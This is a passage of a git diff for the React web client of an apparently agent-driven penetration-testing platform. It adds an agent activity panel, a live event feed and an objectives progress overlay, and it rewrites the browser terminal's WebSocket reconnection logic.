+ + ); +} diff --git a/clients/web/src/components/layout/sidebar.tsx b/clients/web/src/components/layout/sidebar.tsx index b05b21ea..115d3454 100644 --- a/clients/web/src/components/layout/sidebar.tsx +++ b/clients/web/src/components/layout/sidebar.tsx @@ -9,6 +9,7 @@ import { Crosshair, Radio, ClipboardList, + Clock, FolderOpen, FileWarning, Network, @@ -47,6 +48,7 @@ const globalNav: NavItem[] = [ const engagementNav: NavItem[] = [ { href: "/live", label: "Live", icon: Radio, engagementScoped: true }, { href: "/plan", label: "Plan", icon: ClipboardList, engagementScoped: true }, + { href: "/timeline", label: "Timeline", icon: Clock, engagementScoped: true }, { href: "/documents", label: "Documents", icon: FolderOpen, engagementScoped: true }, { href: "/findings", label: "Findings", icon: FileWarning, engagementScoped: true }, { href: "/graph", label: "Attack Graph", icon: Network, engagementScoped: true }, diff --git a/clients/web/src/components/streaming/agent-detail-panel.tsx b/clients/web/src/components/streaming/agent-detail-panel.tsx new file mode 100644 index 00000000..0c4f1e03 --- /dev/null +++ b/clients/web/src/components/streaming/agent-detail-panel.tsx @@ -0,0 +1,369 @@ +"use client"; + +/** + * AgentDetailPanel — Slide-in panel showing detailed activity for a selected agent. + * + * Filters the global SubagentCustomEvent stream to the selected agent, + * derives current status, and renders a mini-feed of recent tool calls and messages. + */ + +import { useEffect, useMemo, useRef } from "react"; +import type { SubagentCustomEvent } from "@decepticon/streaming"; +import type { AgentConfig } from "@/lib/agents"; +import { AGENT_DISPLAY_CONFIG } from "@/lib/agents"; +import { cn } from "@/lib/utils"; +import { Badge } from "@/components/ui/badge"; +import { ScrollArea } from "@/components/ui/scroll-area"; +import { Separator } from "@/components/ui/separator"; +import { X, Wrench, MessageSquare, Clock } from "lucide-react"; +import ReactMarkdown from "react-markdown"; + +// ── Types ────────────────────────────────────────────────────────── + +interface AgentDetailPanelProps { + agent: AgentConfig | null; + events: SubagentCustomEvent[]; + onClose: () => void; + className?: string; +} + +// ── Helpers ──────────────────────────────────────────────────────── + +type AgentStatus = "idle" | "processing" | "completed"; + +const STALENESS_THRESHOLD_MS = 15_000; // Agent idle if no recent event + +function deriveStatus(agentEvents: SubagentCustomEvent[], now: number): AgentStatus { + if (agentEvents.length === 0) return "idle"; + + const last = agentEvents[agentEvents.length - 1]; + if (last.type === "subagent_end") return "completed"; + + // Stale events: if most recent event is older than threshold, agent is + // no longer active — likely finished while observer was disconnected + if (last.elapsed != null && last.elapsed * 1000 > STALENESS_THRESHOLD_MS) { + return "idle"; + } + + if ( + last.type === "subagent_start" || + last.type === "subagent_tool_call" || + last.type === "subagent_message" + ) { + return "processing"; + } + + return "processing"; +} + +const STATUS_META: Record< + AgentStatus, + { label: string; dotClass: string } +> = { + idle: { + label: "Idle", + dotClass: "bg-zinc-500", + }, + processing: { + label: "Processing", + dotClass: "bg-amber-400 animate-pulse", + }, + completed: { + label: "Completed", + dotClass: "bg-emerald-400", + }, +}; + +function formatElapsed(ms: number): string { + if (ms < 1000) return "just now"; + const seconds = Math.floor(ms / 1000); + if (seconds < 60) return `${seconds}s ago`; + const minutes = Math.floor(seconds / 60); + if (minutes < 60) return `${minutes}m ago`; + return `${Math.floor(minutes / 60)}h ago`; +} + +function truncate(text: string, max: number): string { + if (text.length <= max) return text; + return text.slice(0, max) + "…"; +} + +// ── Component ────────────────────────────────────────────────────── + +export function AgentDetailPanel({ + agent, + events, + onClose, + className, +}: AgentDetailPanelProps) { + // Escape key handler + useEffect(() => { + if (!agent) return; + + function handleKeyDown(e: KeyboardEvent) { + if (e.key === "Escape") { + onClose(); + } + } + + document.addEventListener("keydown", handleKeyDown); + return () => document.removeEventListener("keydown", handleKeyDown); + }, [agent, onClose]); + + // Filter events for this agent + const agentEvents = useMemo(() => { + if (!agent) return []; + return events.filter((e) => e.agent === agent.id); + }, [agent, events]); + + // Last 20 events for the mini-feed + const recentEvents = useMemo( + () => agentEvents.slice(-20), + [agentEvents], + ); + + // Elapsed time since last event + const feedRef = useRef(null); + const now = Date.now(); + + // Derive status + const status = useMemo(() => deriveStatus(agentEvents, now), [agentEvents, now]); + const statusMeta = STATUS_META[status]; + + // Latest subagent_message content + const latestMessage = useMemo(() => { + const messages = agentEvents.filter((e) => e.type === "subagent_message"); + if (messages.length === 0) return null; + return messages[messages.length - 1]; + }, [agentEvents]); + + + if (!agent) return null; + + const displayMeta = AGENT_DISPLAY_CONFIG[agent.id]; + const agentColor = agent.color ?? displayMeta?.color ?? "#6b7280"; + + return ( +
+ {/* ── Header ─────────────────────────────────────────── */} +
+ {agent.mascotEmoji} +
+
+ + {agent.name} + + + {agent.role} + +
+
+ +
+ + {/* ── Status ─────────────────────────────────────────── */} +
+ + {statusMeta.label} + {agentEvents.length > 0 && ( + + {agentEvents.length} event{agentEvents.length !== 1 ? "s" : ""} + + )} +
+ + {/* ── Recent Activity ────────────────────────────────── */} +
+
+ + Recent Activity + +
+ + +
+ {recentEvents.length === 0 ? ( + agent.id === "decepticon" ? ( +
+

Orchestrator

+

Decepticon coordinates sub-agents via task() delegation.

+

Activity appears on the sub-agent nodes, not here.

+

Click a sub-agent node in the graph to see its activity.

+
+ ) : ( +

+ No activity yet +

+ ) + ) : ( + recentEvents.map((event, i) => ( + + )) + )} +
+
+ + {/* ── Latest Message ─────────────────────────────── */} + {latestMessage && latestMessage.content && ( + <> + +
+ + Latest Message + +
+ +
+ {latestMessage.content} +
+
+ + )} +
+
+ ); +} + +// ── Activity Row ─────────────────────────────────────────────────── + +function ActivityRow({ + event, + agentColor, + now, +}: { + event: SubagentCustomEvent; + agentColor: string; + now: number; +}) { + const elapsed = event.elapsed != null ? event.elapsed * 1000 : undefined; + + switch (event.type) { + case "subagent_tool_call": + return ( +
+ +
+ + {event.tool ?? "unknown"} + + {event.content && ( +

+ {truncate(event.content, 80)} +

+ )} +
+ {elapsed != null && ( + + + {formatElapsed(elapsed)} + + )} +
+ ); + + case "subagent_tool_result": + return ( +
+ +
+ + Result:{" "} + + {event.tool ?? "tool"} + + + {event.content && ( +

+ {truncate(event.content, 80)} +

+ )} +
+ {elapsed != null && ( + + + {formatElapsed(elapsed)} + + )} +
+ ); + + case "subagent_message": + return ( +
+ +

+ {truncate(event.content ?? event.text ?? "", 100)} +

+
+ ); + + case "subagent_start": + return ( +
+ + Started +
+ ); + + case "subagent_end": + return ( +
+ + + Completed + {event.status ? ` — ${event.status}` : ""} + + {elapsed != null && ( + + + {formatElapsed(elapsed)} + + )} +
+ ); + + case "ask_user_question": + return ( +
+ +

+ {truncate(event.question ?? event.content ?? "Awaiting input", 100)} +

+
+ ); + + default: + return null; + } +} diff --git a/clients/web/src/components/streaming/live-activity-feed.tsx b/clients/web/src/components/streaming/live-activity-feed.tsx new file mode 100644 index 00000000..94a5af00 --- /dev/null +++ b/clients/web/src/components/streaming/live-activity-feed.tsx @@ -0,0 +1,437 @@ +"use client"; + +import { useEffect, useRef, useState, useCallback } from "react"; +import type { SubagentCustomEvent } from "@decepticon/streaming"; +import { AGENT_DISPLAY_CONFIG } from "@/lib/agents"; +import { cn } from "@/lib/utils"; +import { ScrollArea } from "@/components/ui/scroll-area"; +import { Badge } from "@/components/ui/badge"; +import { + Bot, + CheckCircle, + CheckCircle2, + Wrench, + MessageSquare, + HelpCircle, + Target, + Clock, + XCircle, + Loader2, + FolderOpen, + Activity, +} from "lucide-react"; + +// ── Types ──────────────────────────────────────────────────────── + +interface LiveActivityFeedProps { + events: SubagentCustomEvent[]; + engagementId: string; + className?: string; +} + +interface Objective { + id: string; + title: string; + status: string; + phase: string; + owner?: string; +} + +interface FileEntry { + name: string; + folder: string; + path: string; + size: number; +} + +// ── Helpers ────────────────────────────────────────────────────── + +function getAgentColor(agentId: string): string { + return AGENT_DISPLAY_CONFIG[agentId]?.color ?? "#6b7280"; +} + +function getAgentName(agentId: string): string { + return AGENT_DISPLAY_CONFIG[agentId]?.name ?? agentId; +} + +function formatRelativeTime(ms: number): string { + const seconds = Math.floor(ms / 1000); + if (seconds < 1) return "now"; + if (seconds < 60) return `${seconds}s ago`; + const minutes = Math.floor(seconds / 60); + if (minutes < 60) return `${minutes}m ago`; + const hours = Math.floor(minutes / 60); + return `${hours}h ago`; +} + +function summarizeArgs(args?: Record): string { + if (!args) return ""; + const keys = Object.keys(args); + if (keys.length === 0) return ""; + const parts = keys.slice(0, 2).map((k) => { + const v = args[k]; + const s = typeof v === "string" ? v : JSON.stringify(v) ?? ""; + return `${k}: ${s.length > 30 ? s.slice(0, 30) + "…" : s}`; + }); + if (keys.length > 2) parts.push("…"); + return parts.join(", "); +} + +function formatSize(bytes: number): string { + if (bytes < 1024) return `${bytes} B`; + if (bytes < 1024 * 1024) return `${(bytes / 1024).toFixed(1)} KB`; + return `${(bytes / (1024 * 1024)).toFixed(1)} MB`; +} + +const OBJ_STATUS_ICON: Record = { + completed: { icon: CheckCircle2, color: "text-emerald-400" }, + "in-progress": { icon: Loader2, color: "text-amber-400" }, + blocked: { icon: XCircle, color: "text-red-400" }, + pending: { icon: Clock, color: "text-zinc-600" }, + cancelled: { icon: XCircle, color: "text-zinc-600" }, +}; + +// ── Event Row ──────────────────────────────────────────────────── + +interface EventRowProps { + event: SubagentCustomEvent; + relativeTime: string; +} + +function EventRow({ event, relativeTime }: EventRowProps) { + const [expanded, setExpanded] = useState(false); + const color = getAgentColor(event.agent); + const name = getAgentName(event.agent); + + let icon: React.ReactNode; + let detail: React.ReactNode; + let rowClass = ""; + + switch (event.type) { + case "subagent_start": { + icon = ; + detail = ( + + {name} started + {event.content ? — {event.content} : null} + + ); + break; + } + case "subagent_end": { + const isError = !!event.error; + icon = ; + detail = ( + + {name} completed{event.elapsed != null ? ` (${event.elapsed.toFixed(1)}s)` : ""} + {isError ? " — error" : ""} + + ); + if (isError) rowClass = "bg-red-500/5"; + break; + } + case "subagent_tool_call": { + const argsSummary = summarizeArgs(event.args); + icon = ; + detail = ( + + {name} → {event.tool} + {argsSummary ? ({argsSummary}) : null} + + ); + break; + } + case "subagent_tool_result": { + icon = ; + detail = ( + + {name} ← {event.tool} done + + ); + break; + } + case "subagent_message": { + const text = event.content ?? event.text ?? ""; + const truncated = text.length > 200 && !expanded; + icon = ; + detail = ( + + {name}:{" "} + {truncated ? text.slice(0, 200) + "…" : text} + {text.length > 200 && ( + + )} + + ); + break; + } + case "ask_user_question": { + icon = ; + detail = ( + + {name} waiting: {event.question ?? event.content ?? "awaiting input"} + + ); + rowClass = "bg-amber-500/5"; + break; + } + default: { + icon = ; + detail = {name}: {event.type}; + } + } + + return ( +
+ {relativeTime} + + {name} + + {icon} + {detail} +
+ ); +} + +// ── Idle State — shows OPPLAN + workspace when no events ───────── + +function IdleState({ engagementId }: { engagementId: string }) { + const [objectives, setObjectives] = useState([]); + const [files, setFiles] = useState([]); + const [loading, setLoading] = useState(true); + + useEffect(() => { + let active = true; + async function load() { + try { + const [opplanRes, engRes] = await Promise.all([ + fetch(`/api/engagements/${engagementId}/opplan`).catch(() => null), + fetch(`/api/engagements/${engagementId}`).catch(() => null), + ]); + + if (!active) return; + + if (opplanRes?.ok) { + const data = await opplanRes.json(); + setObjectives(data.objectives ?? []); + } + + if (engRes?.ok) { + const eng = await engRes.json(); + const name = eng.workspacePath?.split("/").pop() ?? eng.name; + if (name) { + const filesRes = await fetch(`/api/workspace/${encodeURIComponent(name)}/files`).catch(() => null); + if (filesRes?.ok && active) { + const fData = await filesRes.json(); + const allFiles = (fData.folders ?? []).flatMap((f: { files: FileEntry[] }) => f.files); + setFiles(allFiles); + } + } + } + } catch { /* ignore */ } + finally { if (active) setLoading(false); } + } + load(); + // Refresh every 10s for live updates + const interval = setInterval(load, 10000); + return () => { active = false; clearInterval(interval); }; + }, [engagementId]); + + if (loading) { + return ( +
+ +
+ ); + } + + const completed = objectives.filter((o) => o.status === "completed").length; + const inProgress = objectives.filter((o) => o.status === "in-progress").length; + const blocked = objectives.filter((o) => o.status === "blocked").length; + + return ( +
+ {/* Header */} +
+ + Engagement Status +
+ + +
+ {/* OPPLAN objectives */} + {objectives.length > 0 && ( +
+
+ + + Objectives + + + {completed}/{objectives.length} + +
+ + {/* Progress bar */} +
+
0 ? (completed / objectives.length) * 100 : 0}%` }} + /> +
+ +
+ {objectives.map((obj) => { + const cfg = OBJ_STATUS_ICON[obj.status] ?? OBJ_STATUS_ICON.pending; + const Icon = cfg.icon; + return ( +
+ + {obj.id} + + {obj.title} + + {obj.owner && ( + + {obj.owner} + + )} +
+ ); + })} +
+ + {/* Summary */} +
+ {inProgress > 0 && {inProgress} running} + {blocked > 0 && {blocked} blocked} + {completed > 0 && {completed} done} +
+
+ )} + + {/* Workspace files */} + {files.length > 0 && ( +
+
+ + + Workspace Files + + {files.length} +
+
+ {files.slice(0, 15).map((f) => ( +
+ {f.folder}/ + {f.name} + {formatSize(f.size)} +
+ ))} + {files.length > 15 && ( + +{files.length - 15} more + )} +
+
+ )} + + {/* Empty state */} + {objectives.length === 0 && files.length === 0 && ( +
+ +

No activity yet

+

+ Use the terminal to start the engagement +

+
+ )} +
+ +
+ ); +} + +// ── LiveActivityFeed ───────────────────────────────────────────── + +export function LiveActivityFeed({ events, engagementId, className }: LiveActivityFeedProps) { + const bottomRef = useRef(null); + const timestampsRef = useRef([]); + const [, tick] = useState(0); + + // Record arrival time for new events + useEffect(() => { + const ts = timestampsRef.current; + if (events.length > ts.length) { + const now = Date.now(); + for (let i = ts.length; i < events.length; i++) { + ts.push(now); + } + } + }, [events.length]); + + // Auto-scroll to bottom when new events arrive + useEffect(() => { + bottomRef.current?.scrollIntoView({ behavior: "smooth" }); + }, [events.length]); + + // Update relative timestamps every 5s + useEffect(() => { + const id = setInterval(() => tick((n) => n + 1), 5000); + return () => clearInterval(id); + }, []); + + const getRelativeTime = useCallback( + (index: number) => { + const recorded = timestampsRef.current[index]; + if (!recorded) return "now"; + return formatRelativeTime(Date.now() - recorded); + }, + // eslint-disable-next-line react-hooks/exhaustive-deps + [], + ); + + // No streaming events — show engagement status instead + if (events.length === 0) { + return ( +
+ +
+ ); + } + + return ( +
+ {/* Header */} +
+ Activity Feed + + {events.length} + +
+ + {/* Feed */} + +
+ {events.map((event, i) => ( + + ))} +
+
+ +
+ ); +} diff --git a/clients/web/src/components/streaming/opplan-live-overlay.tsx b/clients/web/src/components/streaming/opplan-live-overlay.tsx new file mode 100644 index 00000000..b493c548 --- /dev/null +++ b/clients/web/src/components/streaming/opplan-live-overlay.tsx @@ -0,0 +1,309 @@ +"use client"; + +import { useCallback, useEffect, useRef, useState } from "react"; +import { Badge } from "@/components/ui/badge"; +import { ScrollArea } from "@/components/ui/scroll-area"; +import { + CheckCircle2, + XCircle, + Clock, + Loader2, + ChevronDown, + ChevronRight, + Target, +} from "lucide-react"; +import { cn } from "@/lib/utils"; + +// ── Types ─────────────────────────────────────────────────────── + +interface Objective { + id: string; + title: string; + phase: string; + status: string; + priority: number; + description?: string; + acceptanceCriteria?: string[]; +} + +interface OpplanLiveOverlayProps { + engagementId: string; + className?: string; +} + +// ── Status config (mirrors opplan-tracker.tsx) ────────────────── + +const statusConfig: Record< + string, + { icon: typeof CheckCircle2; color: string; label: string } +> = { + completed: { + icon: CheckCircle2, + color: "text-green-400", + label: "Passed", + }, + blocked: { + icon: XCircle, + color: "text-red-400", + label: "Blocked", + }, + "in-progress": { + icon: Loader2, + color: "text-amber-400", + label: "Running", + }, + "in_progress": { + icon: Loader2, + color: "text-amber-400", + label: "Running", + }, + pending: { + icon: Clock, + color: "text-muted-foreground", + label: "Pending", + }, + cancelled: { + icon: XCircle, + color: "text-zinc-600", + label: "Cancelled", + }, +}; + +// ── Component ─────────────────────────────────────────────────── + +export function OpplanLiveOverlay({ + engagementId, + className, +}: OpplanLiveOverlayProps) { + const [objectives, setObjectives] = useState([]); + const [loading, setLoading] = useState(true); + const [expanded, setExpanded] = useState(false); + const [expandedObjectiveId, setExpandedObjectiveId] = useState( + null, + ); + const intervalRef = useRef | null>(null); + + const fetchObjectives = useCallback(async () => { + try { + const res = await fetch( + `/api/engagements/${engagementId}/opplan`, + ); + if (!res.ok) return; + const data = await res.json(); + const fetched: Objective[] = data.objectives ?? []; + setObjectives(fetched); + } catch { + // Silently ignore — stale data is acceptable for an overlay + } finally { + setLoading(false); + } + }, [engagementId]); + + useEffect(() => { + fetchObjectives(); + intervalRef.current = setInterval(fetchObjectives, 5_000); + return () => { + if (intervalRef.current) clearInterval(intervalRef.current); + }; + }, [fetchObjectives]); + + // ── Derived state ── + + const total = objectives.length; + const completed = objectives.filter((o) => o.status === "completed").length; + const blocked = objectives.filter((o) => o.status === "blocked").length; + const resolved = completed + blocked; + const progress = total > 0 ? (resolved / total) * 100 : 0; + + // ── Loading state ── + + if (loading) { + return ( +
+
+ + Loading OPPLAN… +
+
+ ); + } + + // ── Empty state ── + + if (total === 0) { + return ( +
+
+ + No OPPLAN objectives +
+
+ ); + } + + // ── Objective row ── + + function ObjectiveRow({ obj }: { obj: Objective }) { + const config = statusConfig[obj.status] ?? statusConfig.pending; + const StatusIcon = config.icon; + const isInProgress = obj.status === "in-progress" || obj.status === "in_progress"; + const isExpanded = expandedObjectiveId === obj.id; + const hasDetails = obj.description || (obj.acceptanceCriteria && obj.acceptanceCriteria.length > 0); + + return ( +
+ + + {/* Expanded detail */} +
+
+
+ {obj.description && ( +

+ {obj.description} +

+ )} + {obj.acceptanceCriteria && + obj.acceptanceCriteria.length > 0 && ( +
    + {obj.acceptanceCriteria.map((c, i) => ( +
  • + + {c} +
  • + ))} +
+ )} +
+
+
+
+ ); + } + + // ── Main render ── + + return ( +
+ {/* Progress bar — 4px, always visible */} +
+
0 && completed === 0 + ? "bg-red-500" + : progress >= 100 + ? "bg-green-500" + : "bg-amber-400", + )} + style={{ width: `${progress}%` }} + /> +
+ + {/* Header — collapsed summary + toggle */} + + + {/* Expanded objective list */} +
+
+
+ +
+ {objectives.map((obj) => ( + + ))} +
+
+
+
+
+
+ ); +} diff --git a/clients/web/src/components/terminal/web-terminal.tsx b/clients/web/src/components/terminal/web-terminal.tsx index bb2c1a80..03a5e6c8 100644 --- a/clients/web/src/components/terminal/web-terminal.tsx +++ b/clients/web/src/components/terminal/web-terminal.tsx @@ -5,16 +5,27 @@ * * Connects to the standalone terminal WebSocket server which spawns * the CLI in a PTY. Reports the thread ID back to the parent via callback. + * + * Reconnection strategy: + * - Silent reconnect with exponential backoff (1s → 2s → 4s, cap 4s) + * - No terminal spam during reconnect — only a single status line + * - Status bar shows connection state at all times + * - After successful reconnect, clears the status message + * - After 15 failed attempts, stops and offers manual retry */ -import { useEffect, useRef, useCallback } from "react"; +import { useEffect, useRef, useCallback, useState } from "react"; +import { cn } from "@/lib/utils"; const TERMINAL_WS_URL = process.env.NEXT_PUBLIC_TERMINAL_WS_URL ?? "ws://localhost:3003"; +const MAX_RECONNECT_DELAY = 4000; +const INITIAL_RECONNECT_DELAY = 1000; +const MAX_RECONNECT_ATTEMPTS = 15; + +type ConnectionState = "connecting" | "connected" | "reconnecting" | "disconnected" | "error"; interface WebTerminalProps { - /** Engagement DB cuid — used as LangGraph thread metadata. */ engagementId: string; - /** Engagement folder slug — used to scope the sandbox /workspace bind. */ engagementSlug: string; agentId?: string; className?: string; @@ -29,8 +40,8 @@ export function WebTerminal({ onThreadId, }: WebTerminalProps) { const containerRef = useRef(null); - const cleanupRef = useRef<(() => void) | null>(null); - const connectedRef = useRef(false); + const [connState, setConnState] = useState("connecting"); + const engagementIdRef = useRef(engagementId); engagementIdRef.current = engagementId; const engagementSlugRef = useRef(engagementSlug); @@ -40,55 +51,45 @@ export function WebTerminal({ const onThreadIdRef = useRef(onThreadId); onThreadIdRef.current = onThreadId; - const connect = useCallback(async () => { - const container = containerRef.current; - if (!container || connectedRef.current) return; - connectedRef.current = true; - let initSuccess = false; + const termRef = useRef(null); + const fitRef = useRef(null); + const wsRef = useRef(null); + const reconnectTimerRef = useRef | null>(null); + const reconnectAttemptRef = useRef(0); + const disposedRef = useRef(false); + const resizeObserverRef = useRef(null); + const resizeTimerRef = useRef | null>(null); + // Track whether we've shown the reconnecting message (to avoid spam) + const reconnectMsgShownRef = useRef(false); + // Track the onData listener for manual retry so we can dispose it + const retryListenerRef = useRef<{ dispose: () => void } | null>(null); - try { - const [{ Terminal }, { FitAddon }] = await Promise.all([ - import("xterm"), - import("@xterm/addon-fit"), - ]); - - await import("xterm/css/xterm.css"); - - const term = new Terminal({ - cursorBlink: true, - cursorStyle: "bar", - fontSize: 13, - fontFamily: "'JetBrains Mono', 'IBM Plex Mono', 'Fira Code', monospace", - theme: { - background: "#0a0e14", - foreground: "#d4d4d4", - cursor: "#faa32c", - selectionBackground: "#264f78", - black: "#1e1e1e", - red: "#f44747", - green: "#6a9955", - yellow: "#d7ba7d", - blue: "#569cd6", - magenta: "#c586c0", - cyan: "#4ec9b0", - white: "#d4d4d4", - brightBlack: "#808080", - brightRed: "#f44747", - brightGreen: "#6a9955", - brightYellow: "#d7ba7d", - brightBlue: "#569cd6", - brightMagenta: "#c586c0", - brightCyan: "#4ec9b0", - brightWhite: "#ffffff", - }, - allowTransparency: true, - scrollback: 5000, - }); + const cleanup = useCallback(() => { + disposedRef.current = true; + if (reconnectTimerRef.current) clearTimeout(reconnectTimerRef.current); + if (resizeTimerRef.current) clearTimeout(resizeTimerRef.current); + retryListenerRef.current?.dispose(); + resizeObserverRef.current?.disconnect(); + wsRef.current?.close(); + termRef.current?.dispose(); + wsRef.current = null; + termRef.current = null; + fitRef.current = null; + }, []); + + const connectWs = useCallback(() => { + if (disposedRef.current) return; + const term = termRef.current; + if (!term) return; - const fit = new FitAddon(); - term.loadAddon(fit); - term.open(container); - fit.fit(); + // Dispose any pending manual-retry listener + retryListenerRef.current?.dispose(); + retryListenerRef.current = null; + + // Close old WS + if (wsRef.current && wsRef.current.readyState !== WebSocket.CLOSED) { + wsRef.current.close(); + } const eid = engagementIdRef.current; const slug = engagementSlugRef.current; @@ -98,30 +99,17 @@ export function WebTerminal({ `${TERMINAL_WS_URL}?engagementId=${encodeURIComponent(eid)}` + `&engagementSlug=${encodeURIComponent(slug)}` + `&agentId=${encodeURIComponent(aid)}`; - const ws = new WebSocket(wsUrl); - - let disposed = false; - - const cleanup = () => { - if (disposed) return; - disposed = true; - clearTimeout(resizeTimer); - resizeObserver.disconnect(); - ws.close(); - term.dispose(); - connectedRef.current = false; - cleanupRef.current = null; - }; - cleanupRef.current = cleanup; - initSuccess = true; + const ws = new WebSocket(wsUrl); + wsRef.current = ws; ws.onopen = () => { - ws.send(JSON.stringify({ - type: "resize", - cols: term.cols, - rows: term.rows, - })); + setConnState("connected"); + reconnectAttemptRef.current = 0; + reconnectMsgShownRef.current = false; + // Silent reconnect — no terminal output. If the server reattaches us + // to an existing session, the scrollback replay handles visual continuity. + ws.send(JSON.stringify({ type: "resize", cols: term.cols, rows: term.rows })); }; ws.onmessage = (event) => { @@ -129,66 +117,287 @@ export function WebTerminal({ if (data.startsWith("{")) { try { const msg = JSON.parse(data); + // Filter ALL control messages — never write JSON frames to the terminal if (msg.type === "threadId" && msg.threadId) { onThreadIdRef.current?.(msg.threadId); return; } + if (msg.type === "pong" || msg.type === "error" || msg.type === "ping") { + return; // Control message — consume silently + } + if (msg.type === "reattached") { + // Server reattached us to an existing PTY — full reset then + // scrollback replay arrives as raw text right after this message. + term.reset(); + return; + } } catch { - // Not JSON + // Not valid JSON — pass through as terminal output } } term.write(data); }; - ws.onclose = () => {}; - ws.onerror = () => {}; + ws.onclose = (ev) => { + if (disposedRef.current) return; + if (ev.code === 1000) { + // Clean close — process exited normally + setConnState("disconnected"); + term.writeln("\r\n\x1b[90m[Session ended. Press Enter to start a new session.]\x1b[0m"); + const disposable = term.onData(() => { + disposable.dispose(); + reconnectAttemptRef.current = 0; + reconnectMsgShownRef.current = false; + connectWs(); + }); + retryListenerRef.current = disposable; + return; + } + + // Abnormal close — reconnect silently + scheduleReconnect(); + }; + + ws.onerror = () => { + if (disposedRef.current) return; + // onerror always fires before onclose — just update the indicator + setConnState("reconnecting"); + }; + + // Forward input term.onData((data: string) => { - if (ws.readyState === WebSocket.OPEN) { - ws.send(data); + if (wsRef.current?.readyState === WebSocket.OPEN) { + wsRef.current.send(data); } }); + // eslint-disable-next-line react-hooks/exhaustive-deps + }, []); - let resizeTimer: ReturnType; - const resizeObserver = new ResizeObserver(() => { - clearTimeout(resizeTimer); - resizeTimer = setTimeout(() => { - try { - fit.fit(); - if (ws.readyState === WebSocket.OPEN) { - ws.send(JSON.stringify({ - type: "resize", - cols: term.cols, - rows: term.rows, - })); + const scheduleReconnect = useCallback(() => { + if (disposedRef.current) return; + + const attempt = reconnectAttemptRef.current; + + if (attempt >= MAX_RECONNECT_ATTEMPTS) { + setConnState("error"); + const term = termRef.current; + if (term) { + term.writeln("\r\n\x1b[31m[Connection failed. Press Enter to retry.]\x1b[0m"); + reconnectMsgShownRef.current = false; + const disposable = term.onData(() => { + disposable.dispose(); + reconnectAttemptRef.current = 0; + connectWs(); + }); + retryListenerRef.current = disposable; + } + return; + } + + // Show ONE reconnecting message on the first attempt only + // No terminal output during reconnect — status bar shows state. + // The server's session persistence means the PTY is still alive; + // on reattach the scrollback replays seamlessly. + reconnectMsgShownRef.current = true; + + setConnState("reconnecting"); + const delay = Math.min(INITIAL_RECONNECT_DELAY * Math.pow(2, attempt), MAX_RECONNECT_DELAY); + reconnectAttemptRef.current = attempt + 1; + + reconnectTimerRef.current = setTimeout(() => { + if (!disposedRef.current) connectWs(); + }, delay); + }, [connectWs]); + + // Initialize terminal + first connection + const init = useCallback(async () => { + const container = containerRef.current; + if (!container || disposedRef.current) return; + + try { + const [{ Terminal }, { FitAddon }] = await Promise.all([ + import("xterm"), + import("@xterm/addon-fit"), + ]); + await import("xterm/css/xterm.css"); + + if (termRef.current) { + // Already initialized — just reconnect WS + connectWs(); + return; + } + + const term = new Terminal({ + cursorBlink: true, + cursorStyle: "bar", + fontSize: 13, + fontFamily: "'JetBrains Mono', 'IBM Plex Mono', 'Fira Code', monospace", + theme: { + background: "#0a0e14", + foreground: "#d4d4d4", + cursor: "#faa32c", + selectionBackground: "#264f78", + black: "#1e1e1e", + red: "#f44747", + green: "#6a9955", + yellow: "#d7ba7d", + blue: "#569cd6", + magenta: "#c586c0", + cyan: "#4ec9b0", + white: "#d4d4d4", + brightBlack: "#808080", + brightRed: "#f44747", + brightGreen: "#6a9955", + brightYellow: "#d7ba7d", + brightBlue: "#569cd6", + brightMagenta: "#c586c0", + brightCyan: "#4ec9b0", + brightWhite: "#ffffff", + }, + allowTransparency: true, + scrollback: 10000, + }); + + const fit = new FitAddon(); + term.loadAddon(fit); + term.open(container); + fit.fit(); + + termRef.current = term; + fitRef.current = fit; + + // Resize observer + const resizeObserver = new ResizeObserver(() => { + if (resizeTimerRef.current) clearTimeout(resizeTimerRef.current); + resizeTimerRef.current = setTimeout(() => { + try { + fitRef.current?.fit(); + const ws = wsRef.current; + const t = termRef.current; + if (ws?.readyState === WebSocket.OPEN && t) { + ws.send(JSON.stringify({ type: "resize", cols: t.cols, rows: t.rows })); + } + } catch { + // ignore } - } catch { - // Ignore resize errors during teardown + }, 150); + }); + resizeObserver.observe(container); + resizeObserverRef.current = resizeObserver; + + // Connect + connectWs(); + } catch (err) { + setConnState("error"); + console.error("[WebTerminal] Init failed:", err); + } + }, [connectWs]); + + useEffect(() => { + disposedRef.current = false; + init(); + return cleanup; + }, [init, cleanup]); + + // ── Heartbeat: detect silently-dead sockets ────────────────────── + // Ping every 15s; if no data received from server within 20s of a + // ping, the socket is half-open — force-close and let reconnect handle it. + // Pong responses are filtered by onmessage above (never reach terminal). + useEffect(() => { + const PING_INTERVAL = 15000; + const PONG_TIMEOUT = 5000; + let pingTimer: ReturnType; + let pongTimer: ReturnType; + + pingTimer = setInterval(() => { + const ws = wsRef.current; + if (!ws || ws.readyState !== WebSocket.OPEN) return; + try { + ws.send(JSON.stringify({ type: "ping" })); + pongTimer = setTimeout(() => { + // If WS is still the same instance and still "open", it's half-open — kill it + if (wsRef.current === ws && ws.readyState === WebSocket.OPEN) { + ws.close(); + } + }, PONG_TIMEOUT); + } catch { + ws.close(); + } + }, PING_INTERVAL); + + return () => { + clearInterval(pingTimer); + clearTimeout(pongTimer); + }; + }, [connState]); + + // ── Visibility: reconnect when tab becomes visible ─────────────── + // Browsers throttle/kill WS in background tabs. Reconnect on focus. + useEffect(() => { + const handler = () => { + if (document.visibilityState === "visible") { + const ws = wsRef.current; + if (!ws || ws.readyState === WebSocket.CLOSED || ws.readyState === WebSocket.CLOSING) { + reconnectAttemptRef.current = 0; + reconnectMsgShownRef.current = false; + connectWs(); } - }, 150); - }); - resizeObserver.observe(container); - } catch (err) { - if (!initSuccess) connectedRef.current = false; - console.error("[WebTerminal] Init failed:", err); - } - }, []); + } + }; + document.addEventListener("visibilitychange", handler); + return () => document.removeEventListener("visibilitychange", handler); + }, [connectWs]); + // ── Network: reconnect when browser comes back online ──────────── useEffect(() => { - connect(); - return () => { cleanupRef.current?.(); }; - }, [connect]); + const handler = () => { + const ws = wsRef.current; + if (!ws || ws.readyState === WebSocket.CLOSED || ws.readyState === WebSocket.CLOSING) { + reconnectAttemptRef.current = 0; + reconnectMsgShownRef.current = false; + connectWs(); + } + }; + window.addEventListener("online", handler); + return () => window.removeEventListener("online", handler); + }, [connectWs]); + + const statusColor: Record = { + connecting: "bg-amber-400", + connected: "bg-emerald-400", + reconnecting: "bg-amber-400 animate-pulse", + disconnected: "bg-zinc-500", + error: "bg-red-400", + }; + + const statusLabel: Record = { + connecting: "Connecting...", + connected: "Connected", + reconnecting: "Reconnecting...", + disconnected: "Disconnected", + error: "Connection Error", + }; 